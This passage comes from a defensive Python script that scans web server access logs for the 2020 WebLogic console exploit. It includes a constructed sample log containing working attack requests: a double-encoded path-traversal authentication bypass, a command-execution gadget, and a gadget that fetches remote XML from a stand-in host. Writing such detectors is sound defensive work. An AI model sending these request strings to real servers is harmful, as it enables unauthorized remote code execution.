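        if reasons:
            client_ip = line.split(" ", 1)[0]
            hits.append((n, client_ip, m.group("target"), reasons))
    return hits


# Constructed sample log (combined log format). Lines 2-4 mimic the public
# exploit: line 2 is the bare auth bypass, lines 3 and 4 add the two gadgets.
SAMPLE_LOG = [
    '203.0.113.10 - - [29/Oct/2020:03:14:07 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5021 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [29/Oct/2020:03:14:09 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 3018 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Oct/2020:03:20:41 +0000] "POST /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27id%27);%22) HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '198.51.100.7 - - [29/Oct/2020:03:20:55 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://198.51.100.7/poc.xml%22) HTTP/1.1" 200 0 "-" "python-requests/2.24"',
    '192.0.2.44 - - [29/Oct/2020:03:22:10 +0000] "GET /console/css/login.css HTTP/1.1" 200 1882 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(reasons)}\n    {target}")
```

Run it against a real log with `scan_log(open("/var/log/httpd/access_log"))`. A hit on the traversal reasons alone, without a gadget, still deserves a look: the request with `_pageLabel=HomePage1` is the authentication bypass attackers send first to confirm a server is unpatched, before sending the payload that fetches the beacon.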